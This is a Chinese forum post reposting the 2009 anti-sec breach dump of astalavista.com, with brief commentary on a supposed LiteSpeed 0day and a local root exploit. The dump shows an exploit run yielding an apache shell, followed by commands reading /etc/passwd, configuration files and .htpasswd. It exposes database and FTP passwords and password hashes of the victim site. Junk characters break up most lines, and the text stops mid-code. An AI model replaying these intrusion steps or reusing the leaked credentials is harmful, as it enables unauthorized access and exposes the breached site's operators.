里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
: ]1 m; S1 B, J' y8 U4 g) a8 g& E% u1 ^
[root@front3 ~]# curl -I litespeedtech.com
$ s1 P5 k1 W9 o% f/ q0 \& i& RHTTP/1.1 200 OK. F' c8 c$ ^8 z; t; P `; H) q Y
Date: Fri, 05 Jun 2009 22:54:51 GMT) `7 q$ E1 R7 U* Y- @6 t
Server: LiteSpeed4 P- R: A T$ H6 |# ]
5 m; O V' z+ M另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-+ M, c j$ _$ p1 Z C
$ b! `1 v; D! C/ Z+ f2 Q有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
- C; z* ?. [- a8 ?' ?
3 i& l/ ~4 Y$ Q# J
$ M" n! j. X$ Q. h. @7 U$ V/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ 8 M4 N' e2 h4 h3 H6 r; t
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \0 ~- E7 Z" I8 S7 I, I
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \2 U0 k* w# U# v8 z3 w
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /( [% o, G$ L0 _+ i
\/ \/ \/ \/ \/ \/ \/0 x7 l4 L+ n8 J* d5 u% x8 U
The Hacking & Security Community
6 f* N5 m- F% m& Y7 k5 g' i[+] Founded in 1997 by a hacker computer enthusiast
8 p3 R, Z, J5 `2 r[-] Exposed in 2009 by anti-sec group
7 F% G; w' a1 q p' [4 s# @2 x5 P% z+ K) [
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:& s; [/ s& S& q; \* J1 ~
>> 03. Who’s behind the site?
7 I& v, q$ I2 x6 y' G>>, J: l- F. U$ e4 [- h; Z" n6 h0 G
>> A team of security and IT professionals, and a countless number of contributors from all over the world.% G+ K! J6 c- R- L
6 S2 o: P4 o& E2 G* K! ]3 H- ^; ^* X
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?7 H4 t, y( Y) S$ r+ _
>>
+ P, D' Q) x Q/ W3 F& |$ Y>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and) b6 F: t+ r0 k* i: r
military institutions.
8 w( w9 q. D) ]4 B>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
( Z; {# F$ A$ Z
& o8 J3 i+ _& ?9 U- w) d; |6 K$ KWhy has Astalavista been targeted?3 ?& Z* s" L2 U4 ^* h# o) b: y
, [! c7 [1 w* ?: A* q9 N
Other than the fact that they are not doing any of this for the “community” but
X" c1 c1 l$ x$ Xfor the money, they spread exploits for kids, claim to be a security community; W* h% M& T; P* n
(with no real sense of security on their own servers), and they charge you $6.661 l! e! Q# s2 _% Y0 N/ {" c
per months to access a dead forum with a directory filled with public releases8 E* C' C: J; t* C
and outdated / broken services.
' z9 c. U5 j* ]4 d2 r. S4 o: r0 G, g4 g& s( ^; D! C4 k
We wanted to see how good that “team of security and IT professionals” really is.) t" k( V: W( C% L0 @
$ @9 a6 v5 @: e8 R% |- G2 e
Let’s begin." v1 d: v2 u" \% i
2 X: H7 z! r0 E" r, D
anti-sec:~# ./g0tshell astalavista.com -p 80
" c* b3 \0 Q0 G: Z, Q& y. q[+] Connecting to astalavista.com:80, j3 M @8 {- c) {& k$ [
[+] Grabbing banner…
2 [9 s* `4 `% r5 q6 lLiteSpeed
- m6 T- [2 `1 y7 H[+] Injecting shellcode…4 T$ G7 B3 d* `8 _1 U4 y: x: D/ c! M
[-] Wait for it
' T" l6 ]% O- s, ^; V) H3 P N4 y+ {4 _, d2 C1 I& ^
[~] We g0tshell
3 ?( c4 G3 V# V u3 ouname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
+ }, W7 x% l- n( g7 D+ aID: uid=100(apache) gid=500(apache) groups=500(apache)
( k( ^5 `* G2 f, Y! A2 m; O# h5 H4 ]/ }
sh-3.2$ cat /etc/passwd
) u. J/ W6 R& e0 x/ I& k4 U$ croot:x:0:0:root:/root:/bin/bash% {" d( x6 C$ t% _
bin:x:1:1:bin:/bin:/sbin/nologin, M: F; ]8 o( Y4 `4 _
daemon:x:2:2:daemon:/sbin:/sbin/nologin
6 h! p8 I1 [8 Y6 ~adm:x:3:4:adm:/var/adm:/sbin/nologin& l4 N& g" v$ w+ E& C& w
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin/ N! j5 f9 _, p, V H
sync:x:5:0:sync:/sbin:/bin/sync5 w" h- f$ H0 s8 v
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
. o+ e! a) M1 \/ f( N. Vhalt:x:7:0:halt:/sbin:/sbin/halt& D5 W1 G# m# B- M1 H
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin3 O1 h+ H5 j" L1 p( j4 L
news:x:9:13:news:/etc/news:
6 J$ b" G* V+ H0 Muucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
: X4 o d# t2 H C7 i5 Boperator:x:11:0 perator:/root:/sbin/nologin
$ ^7 d0 ]$ {: j1 W; h; C* Vgames:x:12:100:games:/usr/games:/sbin/nologin
2 H( ^9 k1 d s4 L( Ogopher:x:13:30:gopher:/var/gopher:/sbin/nologin. I, \- M6 h: x7 _+ N: P( L* y& |
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
) V; z' ^7 S; d; Wnobody:x:99:99:Nobody:/:/sbin/nologin
& A% C0 @3 k- c+ ?; O8 xrpm:x:37:37::/var/lib/rpm:/sbin/nologin
2 u4 h8 i! G% f v) D) Wdbus:x:81:81:System message bus:/:/sbin/nologin
_. p) P6 y6 p9 Fnscd:x:28:28:NSCD Daemon:/:/sbin/nologin
3 V8 U8 G8 S7 ]# _mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
0 R/ |5 q+ \. K/ ^. _2 Fsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin4 R9 p/ }& c/ k% A% b n/ x
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin- @ O+ }3 @! j x
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
% P( V5 J4 j+ ]% X3 f) g% M" Frpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
3 Q$ q3 `7 w) u' t, srpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin/ n4 m& q' {) w* Q) S% s
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin4 ?/ a1 \4 \& i( _8 h Y. l
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin: P! }3 W; [ F8 A1 @ h
pcap:x:77:77::/var/arpwatch:/sbin/nologin
2 C y0 d9 U* g1 g- Fnamed:x:25:25:Named:/var/named:/sbin/nologin
1 |* P( a& p% l+ v6 k+ r" }apache:x:100:500::/var/www:/bin/false
8 K7 T2 r/ `0 t: b! A) T4 R# |diradmin:x:101:101::/usr/local/directadmin:/bin/bash. U, B9 p7 M6 h" b8 _" `* `
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
% b V4 n) a2 ]+ _/ Twebapps:x:500:501::/var/www/html:/bin/bash+ ~( A0 {( B6 m3 X! n) i
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash5 A7 I0 Z( b" \
admin:x:501:502::/home/admin:/bin/bash. X& Y' W6 V( r( ?: T J4 X9 R9 G
jon:x:502:503::/home/jon:/bin/bash) p: Q3 V* ^! @" O, Q
com:x:503:504::/home/com:/bin/bash% m8 ]/ i2 j& g% r. _
ntp:x:38:38::/etc/ntp:/sbin/nologin1 F% G" P' F3 ]+ R6 B0 ~
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
2 x, t( E$ [2 c% R- Lastanet:x:504:505::/home/astanet:/bin/bash
+ y( |; c" }+ Iavahi:x:70:70:Avahi daemon:/:/sbin/nologin! @& ^3 ?6 Z- L
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
8 A, G( a7 P" ~- r3 H9 T( `" o1 r# g% G
sh-3.2$ cat /etc/hosts" D, d/ \9 v" J0 Y5 t3 r: B
# Do not remove the following line, or various programs
# g4 S; b/ I3 T; Z# that require network functionality will fail.: l8 ?3 `3 \9 x, F9 J# F1 i& c9 T
127.0.0.1 localhost.localdomain localhost
0 _- u( H6 `% z3 ~% M2 \::1 localhost6.localdomain6 localhost64 N/ m, Z, ?1 G0 I9 B$ F- Z
80.74.154.172 asta1.astalavistaserver.com& c ~$ ?) |. V% |6 K3 L0 n8 o
5 `: r2 D" O' v6 k! b( M7 k5 w
sh-3.2$ pwd$ R, x7 M8 O/ w4 U, V% M
/home/com/public_html
, j! K- W7 m8 @; {8 m% m! q9 y$ g2 Y2 u$ i
sh-3.2$ ls -la, ?" x3 z; |: k5 q; W, x
total 18460
+ a/ w, p% e. O* @drwxr-xr-x 30 com apache 4096 May 28 17:06 .
5 ?* I0 a) O- W$ Q" {, U7 Q% v) Fdrwx–x–x 11 com com 4096 Jun 25 2008 ..
: y8 D* Q$ ]" V5 x3 zdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin# B& L2 K+ n; J* O% ]' G2 z8 J5 @8 B9 ~
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
* {2 Z3 a! I9 M; S: X* z& e# }drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin, a, ]4 M- A5 c4 X; e) D% }3 [8 p: K
drwxrwxrwx 2 com com 4096 May 19 00:50 config9 v: h6 M1 L& z8 U0 Y
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
% W0 @/ H8 W5 q+ ?/ c, a' ]drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules/ }! ], s+ N5 {$ A1 p' O2 b6 ~& H/ _
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
+ N$ G. r+ {7 v9 a7 o: F8 Ddrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo7 b, G; P5 V* b* D1 x
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__1 S% ] P# Q6 t G4 Y
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php) q! }' E* s8 H' p& V" K- Y2 ?( o
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd0 C$ G: E4 z1 d5 {. ]- N+ k
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor* G! b4 r5 L O" z9 ~; S6 \
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
( h9 N- U, t( F- p4 N# udrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed5 F ~( l3 _+ N4 o# z
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
- A8 O: z$ |% j+ \- [: M7 s Y-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
8 l! d+ C0 y' I* W9 F6 `-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak N e* b) _1 q2 ~6 r* o. T# Z: S
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool& w: X( E8 q1 G3 Z- r% a0 r
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
. `' \, l4 H* P* H n" k9 V( p) K" L" C-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
( M% n. F$ X. Q4 E8 N( y, Hdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer5 @/ I' p4 w6 c* a' t8 V# F* u0 l
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang: Z: L/ ~! O3 s, d
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib ]: R/ g, Q- J0 z
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
# ?) x; P: ^- k& i$ ddrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
( B- \2 t0 g1 c# r Zdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
3 u7 h2 t9 p% f* Edrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
4 e; g; E% t# A, {/ Z1 s( G# Xdrwxrwxr-x 22 com com 4096 May 28 17:06 _new
- n6 ?: l) W0 ndrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old* [4 M& l- W1 g) ^4 |
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
( ~: B/ ]# d) K6 z$ v5 H: \+ Ddrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
* R( y! V% T, O S: k* o% s l-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt; \5 {. V7 V8 z' c P9 e% v7 c
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml0 N+ i1 [% v' _5 a3 M3 k# X
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php2 y4 m. a; x' ?0 n( X! @
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
5 _9 H* {2 @) b! P( Mdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
/ ^3 N8 ]/ n/ [drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam0 k7 H# W% z+ e7 C
8 K. r& f; Z, g* x% x0 msh-3.2$ head -20 index.php
, W% u, r" @& S/ {9 c5 o<?php
; x; v, V1 w9 t+ k
; L$ m) M0 U5 \! B* V# y/ X9 S% t( z/**- S# r. n9 T: T1 f% \" M' W
* The main page for the CMS
8 L% E( }4 @& X/ l* @copyright CONTREXX CMS - COMVATION AG6 a. ]4 B; `; P
* @author Comvation Development Team
2 R. I! `3 F! x* @version v1.0.9.10.1 stable
3 I v, M3 q+ c* @package contrexx! @0 q, T, p1 G& p' o' L; I
* @subpackage core
, b' k2 i P0 m. s' ~* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage1 Y6 R* S- p f( L. B9 V/ ^' f! s+ K
* @since v0.0.0.06 Q/ Y" v. f. X. S- n
* @todo Capitalize all class names in project; ~: i* J% g5 r8 O* s+ q% ~
* @uses /config/configuration.php: r; a& d3 n5 M; H
* @uses /config/settings.php, H# ?+ \* J/ l9 ]2 g+ |8 f/ K
* @uses /config/version.php
) J. m# o# V$ G" x% N& `6 u& {0 _! b* @uses /core/API.php
$ n; a) P1 F, |0 N) e" K' M* @uses /core_modules/cache/index.class.php
* o$ m4 x: B; R E; J* @uses /core/error.class.php+ x* H" d; r6 q) }! {. U
* @uses /core_modules/banner/index.class.php( s, h0 Z s Z6 ]# ]2 D W1 U% Z
* @uses /core_modules/contact/index.class.php
z3 |3 @$ c# p# x9 {6 ^- Z6 V' Y
3 y0 g+ w3 i2 {9 I8 Vsh-3.2$ cd config/7 V0 T& d" O' A( V$ _7 o2 x
sh-3.2$ ls -la
+ V+ x3 x3 P1 xtotal 32; c" A) [& S. H, k
drwxrwxrwx 2 com com 4096 May 19 00:50 .2 d" N# C& H1 m3 j5 |6 M+ h
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
3 ~+ B( M- O. s5 q8 q3 O% \-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php# B Y3 n0 y, Y- y) V
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
# w" V; g# M Y( \" |6 E$ c( |-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
$ C3 v9 b# P# ]- E7 P0 [1 a-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
- ^( s" Z4 y+ ^7 r* P* S0 Q+ F9 S8 o% B7 S0 f3 Z
sh-3.2$ cat configuration.php
0 S3 z& `4 T8 i[snip]- b0 z2 P0 ~: I9 i2 w/ }2 D
$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost3 X5 u5 d4 C$ G5 ?) Y8 u
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name+ w; f- O, U' k: J! b
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix% g; G1 v v' W/ g. G
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username3 V; V0 U& B: M
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
# Q& _# v1 v& y$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..); V( r* O" E0 I) ?9 t
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)+ r" e; |( @1 d9 j
[snip]: A, H# ^( h9 T+ z
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
* K2 b+ d: x9 P4 R9 A1 s8 J$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode- j/ t) X; ?3 N' \, d9 R* @
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
8 e7 I: V% ^: y; \5 S$_FTPCONFIG['port'] = 21; // Ftp remote port! {9 }1 Y" g$ \% x( ~* I" e% D
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username7 s& X$ J0 U% ]
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
- {6 _9 Y* [ f4 S1 Q4 J$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms* L) Z, f3 _: e) Z
- p4 e* K7 X& zsh-3.2$ cd ..3 ~: z6 K; k# v1 b% b' H
sh-3.2$ cd dvd/
& n7 Y3 q& ~7 V- c% Osh-3.2$ ls -la$ c) |- R) w# f
total 2913780 ]4 Q+ Q; Q, ^; e0 N, }- C3 M0 F8 ]
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
X& C2 u+ _: o( k+ S+ cdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..1 K. _" k8 Q8 p+ _( q2 R1 E4 c
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar4 g# n( t/ a) e5 r9 D
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
1 N+ W; L, r" y; V/ @-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
8 T" l) F) x Q$ l-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
, L2 O4 }! y' a( c1 N4 @8 |
2 Y0 A; q1 K* w9 E5 [" Nsh-3.2$ cat .htaccess! O( ^; x1 W q6 Z. `+ k
authType Basic
% p1 j/ E/ | O! \8 k4 a: Z k4 }" aauthName DVD
8 Q+ D* M7 I, o3 D- B. o. \authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd! ^/ u7 ~" q7 m/ H- n
require valid-user% Z( ^2 Y3 d! E7 ^& F4 N( v m
8 b0 v7 d$ T3 n( esh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd4 g* h+ A5 e. C7 G
DVDdownload:CRD8cuY6.MPT6
) C9 F; L: u' V4 i- {DVDdownload2:CR8a36.wluFMg" [3 e1 Y3 Z2 P. a
" v/ L. ^3 G% k( y* S! L! u! Jsh-3.2$ cat test.php$ C! t7 H/ T1 p3 ~ E, W8 l- Y
<?php
* S5 f: x6 a) U# B8 \3 ^$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
! ^, C8 X+ K* M/ W9 Y' ^; n$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
+ ~2 t, g8 P1 j2 ?/ }echo $url;
5 o3 R! B0 u- h W+ s4 A$ c4 W2 b?>0 e' U6 x' O. z6 l" n
4 l( W5 c* f$ L4 ]( M& Z. L
sh-3.2$ cd modifications/
+ X( G% S* V; v3 v+ C" wsh-3.2$ ls -la
/ j# b7 `4 G; Rtotal 32" O$ a' F9 {6 U6 y
drwxr-xr-x 8 com com 4096 May 11 12:48 .
6 x, Q7 d1 Y ` y+ {/ K, _drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
2 _9 Z' k: Z( G$ K5 \1 Ydrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng! A" C/ U- p- i- |5 |5 L9 g! E- {
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs& R! X. h8 K @& \3 l
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools: X; {5 N3 m/ B4 w* Z
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
5 o% Y( j0 ^1 F5 ]* Z0 C2 Rdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
! E& A$ P7 B- t M( }1 ndrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
- C6 W7 q+ Y# y& ~6 N/ G4 `/ g" |8 L, m! U; S6 a4 H) X. d
sh-3.2$ ls -R; W6 L" O+ d+ {8 f! Q8 y9 i
.:
, r4 \# A; o) I0 I7 r, lcom_avtng cronjobs onlinetools pjirc search _tmp" m0 q$ {( @ u+ o; A% ^
1 b. q: K7 M( J9 r1 n./com_avtng:
/ s) y3 U( h$ y8 F" g- ?' o% k; @: kavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
1 R, Z, q" p7 Q+ g( F; ?* [
5 x4 w+ B% `( |./com_avtng/scripts:
3 u$ e9 c+ w( M" P5 K. |3 e- Ipopunder.js
: r7 p' {; [( Z Y( n% A% Q
* y6 d/ o1 w2 f2 v. t./cronjobs:1 v2 v5 a7 V+ U' w8 x* m# N
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp* X- Z4 d9 A$ Q; e
6 F( t) g. `7 g& i% t" D( A
./cronjobs/tmp:
0 c- g1 J* C" }5 Y U2 R9 I$ Bcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv+ {6 {5 K9 C* F
; s0 j4 G$ j/ g# f0 ~
./onlinetools:
7 \. f1 B v, O2 Y0 jindex.php
& Z5 ]/ Y Y+ p' r: i1 o7 N0 T' z
3 S1 q6 Y* H' U. ?./pjirc:
" N# o. g. X! E) H2 ga_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
: u8 @& Y" Q( b k" EAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt8 p! M4 ]! m: S
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
5 e, M. ?5 S* j4 C3 ^8 e1 g) C. s7 x" {) E3 @& t
./pjirc/img:; o: @% j9 X6 b" E; M
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif$ _! c( G. x0 G$ z6 {' o2 d3 G: P
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
$ L6 _9 P/ _& ~, ?9 l" }- C- {verre-eau.gif" i; y: ^6 X+ G& G( d
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif ! a: a9 D! \6 z9 W+ C) c2 f4 U
verre-vin.gif
5 o# Y" k- G1 ^8 ^& yballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif' z; k( ^4 U0 j% ?3 L3 `7 r
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif2 i1 K' v6 u/ q$ q
0 R$ Y2 n! g( W: U./pjirc/snd:# ~) r' ?1 S1 O" h$ v) \" U
bell2.au ding.au2 H9 O# y% X" t+ I2 t
! T0 d& c% u$ a7 d, f./search:
0 ~ f- w; ~( v% nsearchEngines.php search.php7 E* G( i4 p0 E8 c$ C
9 ~' P$ }% \5 |! g: y/ v$ n7 s./_tmp:
G" A5 n) v! `9 v2 ~defaultPorts.php defaultPorts.txt
7 \- \- b7 }* Y* D2 j- F9 d# H* [/ |" y; r4 |: A
sh-3.2$ cd cronjobs/4 m$ A6 i7 |8 k/ g4 X% M
sh-3.2$ cat exploits.php
3 G8 a! o) K5 P! R2 ], `7 i[snip]' O/ k, B& F7 F
$categories = array();& Z9 `& S/ Q7 h7 z1 z! F2 p v
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
) `2 c1 y. f' A$expolits = file($milw0rmFile);7 W( F& b. P" [; M6 T8 M
$comExploits = array();. K( C" C! }8 D6 t5 O0 F7 R0 P
[snip]7 y, a+ k' K0 ~7 _
// manage data; l% Y# n- s3 E( b4 i
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26402 ]; g% v- X8 K
4 H" |% A. o- l. i, } Y
// get path and title8 p* Z1 C3 w. w5 d& m/ {4 d" y# A3 v
$expolits[$x] = trim($expolits[$x]);2 `- ~" {7 P4 r
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));0 j& }( b! l6 d& m
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);
9 J. s a& m8 z% l' O1 H) b7 P6 [- Z$ n5 ^$ `# u- |2 r9 u+ x
// check if file exists
2 B- W4 @2 L [9 r& A if (file_exists($path)) {
: `) p6 e2 E7 Y, c1 k: ^6 K% Z. Y) o& @, G3 ^
$text = file_get_contents($path);+ [) ^8 }& ~! l: r; _0 }
9 }, A& H) Q+ t }' K3 z // get content and date! d) M0 T$ t7 U T" l
//$text = htmlspecialchars($text, ENT_QUOTES);
8 f' B q+ K2 M6 L8 u1 i $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));! {; a+ t& `4 {$ r
if ($tmptext != ”) {0 @4 \, T/ w! }# M. {9 V
$text = $tmptext;9 f: a" d% J8 E+ q' N
} else {
: ^- f6 p( ` X+ J# T* ^& ^ $text = addslashes(htmlentities($text, ENT_QUOTES));2 K& ~( s- |7 G9 j i5 X$ O
}
" R E7 U7 R2 U/ T8 I; ~ $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));/ a- a+ `- N7 G0 ], {
$tmp = explode('-', $date);
; a! A& w* Z* l# i $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
! a* p* ~. T. i9 Y$ j $cat = getCategory ($path);
( l8 Y( R1 o- \6 h% G $ext = pathinfo(basename($path));
, F5 ^8 m+ |- B% A Z, k, j1 T $ext = $ext['extension'];
' c' f7 V: `& ]9 q. n $qStr = ”
, Y; N' L% W/ D' P/ e. y4 t SELECT `id`5 k6 I/ }* O/ K% J: C- ]# O
FROM `contrexx_module_exploits`
* b% O0 l, }" B6 x: {9 t% c WHERE `title` = ‘” . $title . “‘7 q* \: Y: B2 ^1 s
AND `date` = ‘” . $date . “‘
, ~! h8 Z5 T0 f4 Z1 S% f7 M “;
9 J# b$ b, b' Q/ H* \ echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
1 |* b7 S8 E/ r7 _( \3 o% k $q = $_objDB->query($qStr);( S7 Q$ `" |: d9 ?& g2 q
3 C* p6 h+ C( t: @- d4 F if ($q->numRows() == 0) {
; F7 b) Y+ D% [9 G8 A% L6 V4 B# M3 E' C% v2 g: y' P
// prepare array, i( s- n7 k. V, @ z% b
$comExploits[$x]['date'] = $date;
7 r9 E" [4 g( C- F: p- E+ B $comExploits[$x]['title'] = $title;" `$ j8 b, l: [. h
$comExploits[$x]['author'] = ‘milw0rm’;/ M, G$ X2 Z# [! ]& x* d4 G
$comExploits[$x]['text'] = $text;! z+ \/ J0 L" K3 c' R
$comExploits[$x]['source'] = $ext;
" m/ U) Y" L, p& K $comExploits[$x]['url1'] = ”;- }/ N1 B# x3 e' l# ]0 w
$comExploits[$x]['url2'] = ”;" V/ K1 |6 q, \" m7 i6 c7 f4 Y3 g Z
$comExploits[$x]['catid'] = $cat;
) ?( g( a+ e" \ $comExploits[$x]['lang'] = ‘2′;, V3 \9 \9 ^+ X
$comExploits[$x]['userid'] = ‘12′;& I3 G/ Y! R$ H9 c, o: H8 y7 G- a
$comExploits[$x]['startdate'] = ‘0000-00-00′;3 k! q+ B+ P/ K- J
$comExploits[$x]['enddate'] = ‘0000-00-00′;1 S; }' D" E! k, `4 Z* f. h
$comExploits[$x]['status'] = ‘1′;: [2 f5 h7 L1 {1 h) q
$comExploits[$x]['changelog'] = $date;% z1 Q9 \/ ^2 z3 q% z4 E8 h# F
% Q: B7 [3 P1 _% F$ o; |# B: t
}
" z; @5 {- r1 _( \, @) y2 U+ V[snip]$ S+ Q- z' O6 O6 M
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
, q% ~$ A$ z6 L& Z<rss version=”2.0″>
